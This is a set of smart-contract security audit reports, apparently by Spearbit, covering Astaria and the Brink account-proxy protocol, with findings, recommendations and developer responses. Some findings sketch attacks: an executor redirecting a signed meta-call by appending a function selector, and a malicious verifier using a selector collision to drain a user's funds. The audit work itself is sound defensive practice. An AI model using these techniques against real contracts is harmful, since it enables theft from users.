+5.6.67 Revert with error messages Severity: Informational Context: astaria-core Description: There are many instances of require and revert statements being used without an accompanying error message. Error messages are useful in unit tests to ensure that a call reverted for the intended reason, and they help in identifying the root cause. Recommendation: Add an error message to each revert. Since we recommend converting require statements to revert in the "Mixed use of require and revert" issue, you can use custom errors.
+5.6.68 Mixed use of require and revert Severity: Informational Context: astaria-core, astaria-gpl, CollectionValidator.sol#L64-L67, UniqueValidator.sol#L65-L68 Description: The Astaria codebase uses a mix of require and revert statements. We suggest following only one of these ways of reverting conditionally, for standardization. Recommendation: Convert all require statements to revert. Be careful to invert the conditions while doing so.
+5.6.69 tokenURI should revert on non-existing tokens Severity: Informational Context: LienToken.sol#L294 Description: As per the ERC-721 standard, tokenURI() needs to revert if tokenId doesn't exist. The current code returns an empty string for all inputs. Recommendation: Revert if the token does not exist, e.g. when ownerOf(tokenId) == address(0) (a sketch follows). Astaria: Fixed in commit d9ebf8. Spearbit: Verified.
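A minimal sketch, assuming a recent version of solmate's ERC721 (whose internal _ownerOf mapping is zero for unminted ids); the contract and error names are illustrative:

    pragma solidity ^0.8.0;

    import {ERC721} from "solmate/src/tokens/ERC721.sol";

    contract LienURIExample is ERC721("Lien", "LIEN") {
        error NonexistentToken();

        function tokenURI(uint256 tokenId) public view override returns (string memory) {
            // ERC-721 requires reverting on queries for nonexistent tokens.
            if (_ownerOf[tokenId] == address(0)) revert NonexistentToken();
            return "";
        }
    }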
+5.6.70 Inheriting the same contract twice Severity: Informational Context: Vault.sol#L34, PublicVault.sol#L48-L50 Description: VaultImplementation inherits from AstariaVaultBase (reference). Hence, there is no need to inherit AstariaVaultBase in the Vault and PublicVault contracts, as they both already inherit VaultImplementation. Recommendation: Remove the explicit inheritance of AstariaVaultBase in Vault.sol and PublicVault.sol. Astaria: Fixed in commit 282350. Spearbit: Verified.
+5.6.71 No need to re-cast variables Severity: Informational Context: VaultImplementation.sol#L219, LienToken.sol#L627, VaultImplementation.sol#L315, VaultImplementation.sol#L329 Description: The code above highlights redundant type casts: ERC721 CT = ERC721(address(COLLATERAL_TOKEN())); ... address(msg.sender) These casts convert variables to the type they already have. Recommendation: Remove the casts: - ERC721 CT = ERC721(address(COLLATERAL_TOKEN())); + ERC721 CT = COLLATERAL_TOKEN(); ... - address(msg.sender) + msg.sender
+5.6.72 Comments do not match implementation Severity: Informational Context: AstariaVaultBase.sol#L9-L40, ILienToken.sol#L63, LienToken.sol#L758 Description: • Scenarios 1 & 2: comments note where each parameter ends in a packed byte array, or the parameter width in bytes; the comments are outdated. • Scenario 3: the "unless" is not implemented. Recommendation: • Scenario 1: update AstariaVaultBase.sol#L9-L40 to the correct locations: abstract contract AstariaVaultBase is Clone, IAstariaVaultBase { function name() public view virtual returns (string memory); function symbol() public view virtual returns (string memory); function ROUTER() public pure returns (IAstariaRouter) { return IAstariaRouter(_getArgAddress(0)); //ends at 20 } function IMPL_TYPE() public pure returns (uint8) { return _getArgUint8(20); //ends at 21 } function owner() public pure returns (address) { - return _getArgAddress(21); //ends at 44 + return _getArgAddress(21); //ends at 41 } function asset() public pure virtual returns (address) { - return _getArgAddress(41); //ends at 64 + return _getArgAddress(41); //ends at 61 } function START() public pure returns (uint256) { - return _getArgUint256(61); + return _getArgUint256(61); //ends at 93 } function EPOCH_LENGTH() public pure returns (uint256) { - return _getArgUint256(93); //ends at 116 + return _getArgUint256(93); //ends at 125 } function VAULT_FEE() public pure returns (uint256) { - return _getArgUint256(125); + return _getArgUint256(125); //ends at 157 } function COLLATERAL_TOKEN() public view returns (ICollateralToken) { return ROUTER().COLLATERAL_TOKEN(); } } • Scenario 2: ILienToken.sol#L63: Details has 5 uint256 values: 32 * 5. • Scenario 3: remove the comment or update the implementation.
+5.6.73 Function can be made internal Severity: Informational Context: LienToken.sol#L649 Description: calculateSlope is only used internally, so its visibility can be changed from public to internal.
+5.6.74 Incomplete NatSpec Severity: Informational Context: • LienToken.sol#L616 • LienToken.sol#L738-L750 • CollateralToken.sol#L616-L628 • VaultImplementation.sol#L153-L165 • VaultImplementation.sol#L298-L310 • AstariaRouter.sol#L75-L77 • AstariaRouter.sol#L44-L47 Description: • LienToken.sol#L616: s and @return missing. • LienToken.sol#L738-L750: s, position, and @return missing. • CollateralToken.sol#L616-L628: tokenId_ missing. • VaultImplementation.sol#L153-L165: the second * of /** is missing, causing the compiler to ignore the NatSpec. The NatSpec also appears to document an old function interface; the params do not match the function inputs.
• VaultImplementation.sol#L298-L310: stack and the return value missing. • AstariaRouter.sol#L75-L77: @param NatSpec is missing for _WITHDRAW_IMPL, _BEACON_PROXY_IMPL, and _CLEARING_HOUSE_IMPL. • AstariaRouter.sol#L44-L47: leave a comment that AstariaRouter also acts as an IBeacon for different cloned contracts. Recommendation: Complete the NatSpec comments.
+5.6.75 Cannot have multiple liens with the same parameters Severity: Informational Context: LienToken.sol#L396 Description: Lien ids are computed by hashing the Lien struct itself. This means that no two liens can have the same parameters (e.g. the same amount, rate, duration, etc.). Recommendation: No changes; document the constraint. Astaria: Working as intended. Spearbit: Acknowledged.
+5.6.76 Redundant unchecked can be removed Severity: Informational Context: LienToken.sol#L264, LienToken.sol#L347, LienToken.sol#L395, WithdrawProxy.sol#L282, PublicVault.sol#L286 Description: There are no arithmetic operations in these unchecked blocks; for clarity, they can be removed. Recommendation: Remove the unchecked blocks.
+5.6.77 Argument name reused with a different meaning across contracts Severity: Informational Context: AstariaRouter.sol#L476 Description: In VaultImplementation, receiver is the borrower, while here and in ILienToken.LienActionEncumber, receiver is the lender (the receiver of the LienToken). Recommendation: Consider verbose naming, such as lienTokenReceiver, to reduce the opportunity for confusion.
+5.6.78 Licensing conflict on inherited dependencies Severity: Informational Context: WithdrawProxy.sol#L18, and others Description: The version of the Solmate contracts that the gpl repository depends on is AGPL-licensed, making the gpl repository adopt the same license. This license is incompatible with the currently UNLICENSED Astaria contracts. Recommendation: 1. Consider the later versions of Solmate, which have updated licensing. 2. Consider applying the AGPL license to Astaria.
diff --git a/findings_newupdate/spearbit/Brink-Spearbit-Security-Review-Engagement-1.txt b/findings_newupdate/spearbit/Brink-Spearbit-Security-Review-Engagement-1.txt new file mode 100644 index 0000000..64ae7b9 --- /dev/null +++ b/findings_newupdate/spearbit/Brink-Spearbit-Security-Review-Engagement-1.txt @@ -0,0 +1,25 @@
+4.1.1 The storage slots corresponding to _implementation and _owner could be accidentally overwritten Severity: High Risk Context: ProxyStorage.sol#L7-L10 contract ProxyStorage { address internal _implementation; address internal _owner; } The state variables _implementation and _owner are at slots 0 and 1. The protocol architecture relies on executors calling metaDelegateCall to verifier contracts; therefore, these storage slots are shared with the storage space of the verifiers. Risk: The first 2 state variables declared in a verifier will overlap with _implementation and _owner. Accidentally changing these variables will result in changing the implementation and changing the owner; funds could be stolen or made inaccessible (accidentally or on purpose). Recommendations: 1. Store the variables at a quasi-random storage location determined by a Keccak-256 hash. This pattern is used in Bit.sol#L33. 2. Let the verifiers inherit from ProxyStorage.sol so that the variables _implementation and _owner are mapped in storage and will not be overwritten accidentally. It is recommended to check the storage layout using solc --storage-layout or the equivalent standard-json flag to verify that this is indeed the case; we recommend building a small tool for doing this. 3.
Store the _implementation and the _owner as constants or immutables. This allows for a smaller proxy that saves gas; however, it requires some architectural changes. Brink: We chose to fix, but took a slightly different approach than any of the recommended fixes. Our fix is closest to recommendation 3. While recommendations 1 and 2 would have been simpler to implement, and may prevent an accidental overwrite of the _implementation and _owner values, fixing in this way would not prevent an attacker from overwriting these values by tricking an account owner into signing permissions for the overwrite. We wanted to make the values fully immutable after Proxy deployment. We updated Proxy.sol to include two constants: ACCOUNT_IMPLEMENTATION, which is the deterministic address for the Account.sol deployment and will be consistent across all chains, and OWNER, which is set to the placeholder address 0xfefeFEFeFEFEFEFEFeFefefefefeFEfEfefefEfe. We created AccountFactory.sol, which dynamically creates the Proxy init code, inserting the actual owner address at the same location as the OWNER placeholder. When Proxy makes a delegatecall to Account, the value of OWNER is read using extcodecopy (ProxyGettable.sol). Constants and immutables read from a contract executed via delegatecall are read from the implementation contract (Account.sol), not the calling contract (Proxy); using extcodecopy lets us read a constant value from the Proxy's deployed bytecode. Note: In order for us to compile Proxy.sol with the OWNER placeholder included in the deployed bytecode, we had to include a reference to it in the contract (outside of the constructor). We found Proxy.sol#L40 to be the most gas-efficient way to accomplish this. We believe it has no security impact on the Proxy, and only increases the gas for incoming ETH transfers by a negligible amount. Brink Update: We updated to use a Minimal Proxy with the owner address appended at the end of the deployed bytecode: commit 0ed725b. Spearbit: We welcome this change, and performed a follow-up review focused on the modified Minimal Proxy contract. Overall, we agree that the issues are resolved; detailed comments can be found in the follow-up report.
4.2 Medium Risk
+4.2.1 Risk of replay attacks across chains Severity: Medium Risk, Gas Optimization Context: EIP712SignerRecovery.sol#L12-L14 Currently, for deployments on EVM-compatible chains, the unique identifier _chainId is specified by Brink. Users need to trust the deployer, i.e. Brink, to use unique values of _chainId for different chains. If the deployer violates this condition, there is a risk of replay attacks, where messages signed on one chain may be replayed on another chain. Recommendation: Read the chain id on-chain directly, using block.chainid (available from Solidity 0.8.0) or chainid() in inline assembly for older Solidity versions, rather than taking it as a constructor parameter: constructor(uint256 _chainId) EIP712SignerRecovery(_chainId) { ... } It is also a gas optimization (saves 1 gas). Brink: Fixed in commit feef7d9. There is a potential risk that a chain could hard-fork a change to the chain id value, which would invalidate all signed messages. The main benefit and reason for the fix was so that the Account.sol address can be consistent across all chains. Since Proxy.sol now sets this address to the ACCOUNT_IMPLEMENTATION constant, this keeps all Proxy addresses consistent across all chains as well. Spearbit: Resolved. We think that a hardfork / protocol upgrade that changes the value of chainid is extremely unlikely on almost all big chains, therefore this risk is acceptable.
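A minimal sketch of reading the chain id on-chain (Solidity >= 0.8.0); the contract name is illustrative:

    pragma solidity ^0.8.0;

    contract ChainIdExample {
        // An EIP-712 domain separator should bind to the live chain id rather
        // than a constructor-supplied value that may not match the chain.
        function currentChainId() public view returns (uint256) {
            return block.chainid;
        }
    }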
+4.2.2 Selfdestruct risks in delegateCall() Severity: Medium Risk Context: Account.sol#L48-L57 function delegateCall(address to, bytes memory data) external { require(proxyOwner() == msg.sender, "NOT_OWNER"); assembly { let result := delegatecall(gas(), to, add(data, 0x20), mload(data), 0, 0) if eq(result, 0) { returndatacopy(0, 0, returndatasize()) revert(0, returndatasize()) } } } The address where Account.sol is deployed can be called directly. There is the risk of a potential selfdestruct, which would result in user wallets getting bricked. This risk depends on the access control of the functions delegateCall, metaDelegateCall, and metaDelegateCall_EIP1271; however, we couldn't find a hole in the access control. We would still recommend the following changes: 1. Explicitly enforce that these functions are only delegatecalled. The following contract demonstrates how this can be achieved: abstract contract OnlyDelegateCallable { address immutable deploymentAddress = address(this); modifier onlyDelegateCallable() { require(address(this) != deploymentAddress); _; } } 2. Note that the Solidity compiler enforces call protection for libraries, i.e., the compiler automatically adds an equivalent of the above onlyDelegateCallable modifier to state-modifying functions. Changing the contract to a library would require additional changes in the codebase. 3. Deploy Account.sol via CREATE2 so it can be redeployed if necessary. Note: Assuming that the current access control can be broken, and that the address corresponding to the Account.sol contract holds funds, an attacker could steal the funds from this address. However, this is not the most significant risk. Brink: Fixed in commit 3afeaf1. Spearbit: Resolved.
+4.2.3 Check for non-zero data Severity: Medium Risk Context: Account.sol#L76-L78 bytes memory callData = abi.encodePacked(data, unsignedData); The function metaDelegateCall() does not currently check whether data is non-empty. Risk: If data.length is equal to 0, the call should go to the fallback or receive function; however, a malicious verifier can redirect this call to another function by crafting unsignedData. For example, assume that the user signed a meta transaction to the following contract's fallback function: contract C { fallback() external { // do something useful } function f() external { // steal funds } } The executor can append the selector of f to unsignedData, thereby executing the call to f instead of the fallback function. Note: similarly, if the signed data is less than 4 bytes in length, i.e., the length of a function selector, executors could redirect the actual call to another function in the same contract, and potentially steal funds. Recommendation: Check that data.length is greater than or equal to 4 bytes: require(data.length >= 4); Brink: We chose not to implement a fix. Our reasoning is that there are many ways for a malicious verifier to attack a user's account, but all of these attacks require tricking the user into signing a message with the malicious verifier contract set as the to address. Even if we prevent valid signing of empty call data, users could still sign malicious messages with valid call data. Reverting on empty call data doesn't reduce the potential for this type of attack. These attacks need to be mitigated off-chain. Spearbit: As this falls under the trust model for the protocol, i.e., trusting verifier contracts, we accept Brink's approach. See the section on verifiers that discusses the risk model.
4.3 Low Risk
+4.3.1 Implement SafeERC20 to avoid non-zero to non-zero approvals Severity: Low Risk Context: TransferHelper.sol#L12-L13 (bool success, bytes memory data) = token.call(abi.encodeWithSelector(0x095ea7b3, to, value)); require(success && (data.length == 0 || abi.decode(data, (bool))), 'APPROVE_FAILED'); The current function allows non-zero to non-zero approvals; however, some ERC20 tokens revert in such cases. Reference: approval race protections. Recommendations: 1. Implement SafeERC20 from OpenZeppelin, in particular safeApprove, if it is used. 2. Replace the hex selector with .selector, i.e. abi.encodeWithSelector(token.approve.selector, to, value); 3. The function safeApprove is currently not used; we recommend removing it. Brink: We removed TransferHelper from LimitSwapVerifiers (commit 7e6df62), because transfer checks were not needed there. It is still used in TransferVerifier, but safeApprove() is not used. We will consider implementing this fix for future verifiers if safeApprove() is used. Spearbit: Resolved.
4.4 Gas Optimizations and Informational
+4.4.1 The function storageLoad() is not required Severity: Gas Optimization Context: Account.sol#L25-L27 The storageLoad function is unnecessary. Recommendation: This information can be obtained off-chain using the getStorageAt JSON-RPC method. Removing the function reduces overall gas, since storageLoad ends up in the function dispatch, making other function calls more expensive. For additional info, here is where storageLoad is used from the SDK: Account.js#L269. Brink: Fixed in commit 743eea1. Spearbit: Resolved.
+4.4.2 Use _owner directly instead of the proxyOwner function Severity: Gas Optimization The proxyOwner() getter is called several times in Account.sol: 1. Account.sol#L35 2. Account.sol#L53 3. Account.sol#L83 require(proxyOwner() == signer, "NOT_OWNER"); Recommendation: Use _owner directly. If possible, consider making it immutable and querying the owner using a callback to the proxy. Note: this optimization may be redundant if a newer version of Solidity is used (>= 0.8.2), which has a bytecode-level inliner that can inline proxyOwner. Brink: No longer relevant after the changes in the proxy: commit d2df98f. Spearbit: Resolved.
+4.4.3 Copy the _delegate code inline in the fallback() function Severity: Gas Optimization Context: Proxy.sol#L27-L29 fallback() external payable { _delegate(_implementation); } Currently, the function _delegate is declared outside the fallback() function; inlining it would save some gas. Recommendation: 1. Move the code inside the _delegate function into the fallback() function, saving around 20-30 gas (a sketch follows). 2. Remove the _delegate function. Note: the inliner improvements in Solidity 0.8.2 are not relevant here, i.e., this function needs to be manually inlined. Brink: Fixed in commit 8ec3c96. Spearbit: Resolved.
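A minimal sketch of the inlined pattern, assuming the classic delegating fallback; the contract and variable names are illustrative:

    pragma solidity ^0.8.0;

    contract ProxySketch {
        address internal _implementation;
        address internal _owner;

        fallback() external payable {
            address impl = _implementation;
            assembly {
                calldatacopy(0, 0, calldatasize())
                let result := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
                returndatacopy(0, 0, returndatasize())
                switch result
                case 0 { revert(0, returndatasize()) }
                default { return(0, returndatasize()) }
            }
        }
    }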
+4.4.5 Change memory to calldata Severity: Gas Optimization For external function parameters, it is often more optimal to have the reference location to be calldata instead of memory. Details can be found in the appendix. Examples: 1. The variable signature in the function metaDelegateCall_EIP1271(). Con- text: Account.sol#L109-L116. function metaDelegateCall_EIP1271( address to, bytes memory data, bytes memory signature, bytes memory unsignedData ,! ) external { require(_isValidSignature( proxyOwner(), keccak256(abi.encode(META_DELEGATE_CALL_EIP1271_TYPEHASH, to, keccak256(data))), signature ,! ), , "INVALID_SIGNATURE"); 2. The variable initCode in the function deployAndExecute. Context: De- ployAndExecute.sol#L23. 12 function deployAndExecute(bytes memory initCode, bytes32 salt, bytes memory ,! execData) external { Note: this is assuming that the last suggestion about having the code inline is not implemented. Note: the gas for the deployAndExecute’s unit test decreased by around 1000 after this change. 3. The variable data in the functions tokenToToken, ethToToken, and token- ToEth. Context: LimitSwapVerifier.sol#L33-L34. function tokenToToken( uint256 bitmapIndex, uint256 bit, IERC20 tokenIn, IERC20 tokenOut, uint256 tokenInAmount, uint256 tokenOutAmount, uint256 expiryBlock, address to, bytes memory data ,! ) 4. The variable signature in the function _recoverSigner. Context: EIP712- SignerRecovery.sol#L19. function _recoverSigner(bytes32 dataHash, bytes memory signature) internal view ,! returns (address) { Brink: 1. Fixed in commit 2831884 and commit 68c68ef. 2. DeployAndExecute.sol was replaced with DeployAndCall.sol. With the new AccountFactory.sol there is no initCode parameter. 3. Fixed in commit 1a0345f. 4. Fixed in commit 2831884. Sperabit: Resolved. +4.4.6 initCode could be hard coded if it is always the same Severity: Gas Optimization Context: DeployAndExecute.sol#L23 function deployAndExecute(bytes memory initCode, bytes32 salt, bytes memory ,! execData) external { Recommendation: Hard code initCode into the contract. This saves a signifi- cant amount of gas, as well as guarantee that the right init code is used. 13 new Proxy{salt: salt}(implementation, proxyOwner); If the code for the deployed contract comes from calldata (as is the case here), it has to go through an inefficient copy to memory (via a for-loop that reads 32- byte chunks of calldata using calldataload, and storing them in memory via mstore). On the other hand, if the initCode is available along with the runtime code of the contract and is called via new Proxy{salt: ...}(...), (it does not matter if it is a create2 or create), it is more efficient, because it uses codecopy to place the underlying initcode in memory rather than the inefficient for loop. this assumes that the initCode remains consistent, which is likely the Note: case for Brink. Brink: We created AccountFactory.sol to deploy Proxy account contracts with constant account implementation addresses and owners, as part of the fix. Proxy initCode is now dynamically created on deploy. Spearbit: Resolved. +4.4.7 The function proxyCall can be removed Severity: Informational, Gas Optimization Context: CallExecutor.sol#L52 function proxyPayableCall(address to, bytes memory data) public payable { There isn’t a need for proxyCall as proxyPaybleCall is more general. The function selector of the function proxyCall(...) is smaller than the selector of proxyPayableCall. 
+4.4.7 The function proxyCall can be removed Severity: Informational, Gas Optimization Context: CallExecutor.sol#L52 function proxyPayableCall(address to, bytes memory data) public payable { There isn't a need for proxyCall, as proxyPayableCall is more general. The function selector of proxyCall(...) is smaller than the selector of proxyPayableCall; therefore, in the function dispatch, proxyCall will appear first (note: this is not always true). Recommendation: We recommend getting rid of proxyCall and just using proxyPayableCall, perhaps after renaming it. Brink: We chose not to fix because of the low impact, but may fix in future verifier contracts.
+4.4.8 Gas optimization for keccak256() Severity: Gas Optimization Context: Bit.sol#L33 return keccak256(abi.encodePacked("bmp", bitmapIndex)); Currently, Brink is computing keccak256() at runtime every time on line 33. Recommendation: It may be worth computing the Keccak hash of the prefix as a constant and deriving the pointer by incrementing this constant; this avoids computing the Keccak-256 hash at runtime. For example, define bytes32 initialPtr = keccak256("bmp"); then the actual pointer can be computed as uint256 ptr = uint256(initialPtr) + n; Note that it is critical that the value of ptr is not slot 0 or 1; otherwise, the storage slots will collide with the owner and implementation of the proxy. One way to achieve this is by limiting the type of n to a short unsigned integer type, for example uint16. Brink: Fixed in commit 1fdf2ea. Spearbit: Resolved.
+4.4.9 Use inline assembly to avoid short-circuiting Severity: Gas Optimization Context: Bit.sol#L26-L28 function validBit(uint256 bit) internal pure returns (bool) { return bit > 0 && bit & bit-1 == 0; } Solidity short-circuits boolean operations; this is implemented using a conditional jump (the jumpi instruction) for each sub-expression. This can be unnecessary in some cases, especially when the sub-expressions are side-effect free. Recommendation: Implement it using inline assembly to avoid the short-circuiting: isValid := and( iszero(iszero(bit)), iszero(and(bit, sub(bit, 1))) ) Note: the expression is parsed as (bit > 0) && ((bit & (bit - 1)) == 0). If this is what is intended, consider adding parentheses to make it explicit. Brink: Fixed in commit cb078d3 and commit 5f487e8. Spearbit: Resolved.
+4.4.10 Use nonces for Bit.sol Severity: Gas Optimization, Informational Context: Bit.sol#L8 library Bit { ... } Currently, for replay protection, quasi-random storage slots are reused up to 256 times, using 1 bit per transaction. With a large number of transactions, more and more storage slots are used. Recommendation: Use nonces for storing transactions that are currently in flight (a sketch follows). For example, assuming that there can be at most 10 in-flight transactions, consider a state variable uint256[10] nonces. For each in-flight transaction, one of the nonces can be used, then incremented during the transaction. An advantage is that each storage slot can be used up to 2**256 times (in contrast to at most 256 times currently), leading to some gas savings. If more simultaneous in-flight transactions are expected, a dynamic array should be used to allow for more nonces. Note: if you can define an upper limit on the transactions in flight, you can use fixed storage slots (0-10) in the lower part of storage, which might be cheaper in the future with the proposed move to stateless Ethereum. Note: this suggestion assumes that the _implementation and _owner variables are moved to immutable variables; otherwise, using slots 0 and 1 would lead to a storage slot clash and a potential lockup of the proxied account. Brink: We chose not to fix because of the complexity of the implementation compared to the relatively small gas savings. We'll consider this implementation for future verifier contracts. Spearbit: While this is reasonable, it is important that all verifiers have compatible replay-protection mechanisms; this avoids accidentally using a nonce that was scheduled by another verifier.
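A minimal sketch of the nonce scheme, assuming a fixed bound on in-flight transactions; the contract and function names are illustrative:

    pragma solidity ^0.8.0;

    contract NonceReplayProtection {
        // One independent nonce stream per concurrently in-flight transaction.
        uint256[10] public nonces;

        // Each signed message commits to (slot, expected); executing it bumps
        // the slot, so the same message cannot be replayed.
        function useNonce(uint256 slot, uint256 expected) internal {
            require(nonces[slot] == expected, "BAD_NONCE");
            unchecked { nonces[slot] = expected + 1; }
        }
    }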
+4.4.11 Upgrade to the latest compiler version: 0.8.10 Severity: Informational, Gas Optimization Context: All contracts. Currently, Brink is using version 0.7.6 of the compiler. Recommendation: Upgrade the compiler to 0.8.10 and lock it to that specific version. Advantages of switching include external calls requiring less gas (extcodesize is no longer checked for calls to functions that have return parameters). Example of an external call that will be 100 gas cheaper: EIP1271Validator.sol#L19. pragma solidity =0.8.10 Brink: Fixed. • commit 9fb87e4 and • commit 864aef4. Spearbit: Resolved.
+4.4.12 Custom errors from version 0.8.4 are more gas efficient Severity: Gas Optimization Context: All uses of revert strings, for example DeployAndExecute.sol#L29: require(createdContract != address(0), "DeployAndExecute: contract not deployed"); Custom errors, available from Solidity 0.8.4, are more gas efficient than revert strings when the revert condition is met, and they also decrease deploy-time costs. Recommendation: Use custom errors instead to save gas. For more information, see the Solidity blog. Brink: Fixed in commit 1260ad0 and commit d1bf851. Spearbit: Resolved.
+4.4.13 Add call protection to LimitSwapVerifier Severity: Informational The contract LimitSwapVerifier is only meant to be delegatecalled. This can be explicitly enforced by adding call protection. Recommendation: Add call protection or, alternatively, use a library instead of a contract, as the Solidity compiler automatically adds this check for libraries. Example of call protection: abstract contract OnlyDelegateCallable { address immutable deploymentAddress = address(this); modifier onlyDelegateCallable() { require(address(this) != deploymentAddress); _; } } Brink: We chose not to implement the fix because there is no risk of selfdestruct, or any other consequence of calling LimitSwapVerifier directly.
+4.4.14 Not following the Solidity memory model in inline assembly usage Severity: Informational Context: 1. Account.sol#L36 assembly { let result := call(gas(), to, value, add(data, 0x20), mload(data), 0, 0) returndatacopy(0, 0, returndatasize()) switch result case 0 { revert(0, returndatasize()) } default { return(0, returndatasize()) } } 2. DeployAndExecute.sol#L32-L42 These inline assembly snippets do not follow Solidity's memory model. The returndatacopy of the calls is stored at memory location 0 onwards; however, this may overwrite the free memory pointer as well as memory beyond offsets 0-64. Risk: 1. This may cause issues with future compiler versions, e.g. if the stack-to-memory mover is needed; this is true for almost all inline assembly usage. Reference: https://twitter.com/ethchris/status/1439879409675259907. 2. The free memory pointer may be overwritten by the return data. If a future refactoring of the code passes control flow back to high-level Solidity, i.e., outside the inline assembly block, this would lead to undefined behaviour. Recommendation: This currently does not cause any issues. Be aware when upgrading to a compiler version that uses the stack-to-memory mover, or when refactoring in a way that passes control flow outside an inline assembly block that overwrites the free memory pointer. The idiomatic approach is to store dynamic data starting from mload(64) (the free memory pointer) rather than from 0 (a sketch follows). However, making this change is not strictly necessary right now. Brink: No fix implemented. The current implementation does not adversely affect functionality, and will not have an impact on any of the call data execution that happens before returndatacopy is executed.
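A minimal sketch of the idiomatic variant, writing return data at the free memory pointer; the contract and function names are illustrative:

    pragma solidity ^0.8.0;

    contract ForwardSketch {
        function forward(address to, bytes memory data) external payable {
            assembly {
                // Use scratch space at the free memory pointer instead of
                // offset 0, so the reserved slots and the pointer stay intact.
                let ptr := mload(0x40)
                let result := call(gas(), to, callvalue(), add(data, 0x20), mload(data), 0, 0)
                returndatacopy(ptr, 0, returndatasize())
                switch result
                case 0 { revert(ptr, returndatasize()) }
                default { return(ptr, returndatasize()) }
            }
        }
    }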
However, making this change is not strictly necessary right now. Brink: No fix implemented. The current implementation does not adversely affect functionality, and will not have an impact on any of the calldata execution that happens before returndatacopy is executed.

+4.4.15 Improving documentation regarding delegatecalls. Severity: Informational Context: Account.sol#L9 There is no explicit documentation stating that the Account contract is supposed to only be delegatecalled. Recommendation: Add a NatSpec comment stating that the contract is only supposed to be delegatecalled. Brink: Fixed commit c92b533 Spearbit: Resolved.

+4.4.16 Variables can be defined inline Severity: Informational Context: Account.sol#L12-L21 Currently, the constants META_DELEGATE_CALL_TYPEHASH and META_DELEGATE_CALL_EIP1271_TYPEHASH are not defined inline. They could be defined inline to improve readability. Recommendation: Declare these variables inline.

bytes32 constant META_DELEGATE_CALL_TYPEHASH =
    keccak256("MetaDelegateCall(address to,bytes data)");
bytes32 constant META_DELEGATE_CALL_EIP1271_TYPEHASH =
    keccak256("MetaDelegateCall_EIP1271(address to,bytes data)");

Brink: Chose not to implement because the impact is very low.

+4.4.17 Add events to other functions beyond cancel Severity: Informational Context: CancelVerifier.sol#L16 emit Cancel(bitmapIndex, bit); There is an emit in cancel(), but not in other functions. Recommendation: Retrieving the execution state is important for cancel() as well as for other functions. If you are doing an emit, it is probably better to do it from Access.sol. This way it is always there and opens up the opportunity to create a graph or subgraph from it. Brink: We have generally avoided emitting events with data that is already included in function params. We may actually remove this Cancel event in a future version of CancelVerifier.

+4.4.18 The function proxyCall can be made external Severity: Informational Context: CallExecutor.sol#L30 function proxyCall(address to, bytes memory data) public { The function is currently marked public; however, it is never called internally. Recommendation: Mark the function external. It is generally good practice to apply the most restrictive visibility possible. Brink: We chose not to fix because of the low impact, but may fix in future verifier contracts.

+4.4.19 Contracts that could be made abstract Severity: Informational It is good practice to mark contracts that are not meant to be instantiated directly as abstract contracts. This is an idiomatic way to ensure that a contract is not meant to be deployed by itself. The following contracts can be made abstract: 1. EIP712SignerRecovery 2. EIP712Validator 3. ProxySettable 4. ProxyGettable 5. ProxyStorage Brink: Fixed commit 3b6d6dd, and ProxySettable.sol was removed, as it was no longer relevant. Spearbit: Resolved.

+4.4.20 Floating pragma is set Severity: Informational Context: All contracts. The current pragma Solidity directive is ^0.7.6. It is recommended to specify a fixed compiler version to ensure that the bytecode produced does not vary between builds. Contracts should be deployed using the same compiler version/flags with which they have been tested. Locking the pragma (e.g. by not using ^ in pragma solidity 0.8.10) ensures that contracts do not accidentally get deployed using an older compiler version with known compiler bugs. Recommendation: Lock the compiler to a specific version. pragma solidity =0.7.6; Brink: Fixed • commit 9fb87e4 and • commit 864aef4.
Spearbit: Resolved.

5 A note on verifiers The Brink protocol relies on verifiers, i.e., smart contracts that perform a specific automation. This is achieved by signing a meta delegatecall to these smart contracts. Because of that, it is very important that these verifier contracts are well vetted. A malicious verifier, for example, directly puts the user at risk of losing all their funds by signing a message to it. There are several ways in which a verifier can hide its malicious behaviour. Some examples are given below: 1. Verifier contract is upgradable: If a verifier contract is upgradable, and a user signs a message to this contract, the verifier can upgrade the contract just before the execution to make the signed data malicious. • Since a typical upgradable contract works by delegatecalling its implementation, where the implementation is stored in storage, these kinds of contracts are inconsistent with Brink.trade. This is because the meta transaction delegatecalls into the verifier, which means that the verifier cannot use its own storage. • A non-typical upgradable pattern involves CREATE2 deploy + selfdestruct + CREATE2 redeploy, where the second redeploy deploys different runtime code. There are some tricks involved in getting the same address with different runtime code: example. If the signer also signs the extcodehash of the verifier contract, such attacks can be prevented: if, during execution, the extcodehash differs from what was part of the signature, the execution reverts. However, this might not cover all possible cases. 2. If anyone can add arbitrary verifier contracts, a user could be tricked in the following way (see the sketch after the recommendations below). • The verifier contract has an innocent-looking function with signature: cancel(uint248 bitmapIndex, uint248 bit) external. • The verifier contract also has a function named safeguardfunds_<nonce>, where the nonce is engineered to collide with the selector of the function cancel(uint256,uint256). Such collisions can easily be found in a few minutes, or one can also look them up on 4byte.directory. • The user may be tricked into signing a call to the cancel verifier; in turn, however, it executes safeguardfunds_<nonce>, which steals funds. Recommendations: 1. Thoroughly vet all verifier contracts, including the function selectors. 2. Avoid verifier contracts that are upgradable. 3. Consider enforcing that all verifiers should be libraries with external functions. The Solidity compiler enforces that libraries do not have state variables and automatically adds call protection to state-modifying functions. 4. Design modular verifiers doing only a single task.
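To make the selector collision concrete, a small illustration (ours; the contract and function names are hypothetical): the EVM dispatcher compares only the first four bytes of keccak256 of the signature, so two unrelated signatures can share a selector.

contract SelectorDemo {
    // Computes the 4-byte selector the dispatcher matches on. An attacker
    // brute-forces a harmless-looking name until its selector equals the
    // one the user believes they are signing a call for.
    function selectorOf(string memory signature) external pure returns (bytes4) {
        return bytes4(keccak256(bytes(signature)));
    }
}

For example, once a suitable nonce is found, selectorOf("cancel(uint248,uint248)") and the engineered selectorOf("safeguardfunds_<nonce>()") return the same four bytes, so the same signed calldata dispatches to either function.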
6 A note on executors The Brink protocol relies on executors running the transaction when certain conditions are met. For example, assume that a user tries to do a limit swap of 1 ETH to 5000 DAI; an executor is required to watch the ETH to DAI price and perform the swap when the price is greater than 5000 DAI. The executor profits from any difference in price. It is therefore imperative that the protocol relies on more than one executor. This is because a single executor can decide to prolong the execution, for example by waiting for the ETH price to be 5500 DAI, making a net profit of 500 DAI. Note: this strategy involves the risk of losing out on potential rewards by waiting for the price to move. Regardless, having multiple independent executors would make the protocol more efficient by keeping the margins low. We recommend that Brink onboard new executors to the platform. The MEV Job Board, for example, would be a good place to advertise for bots.

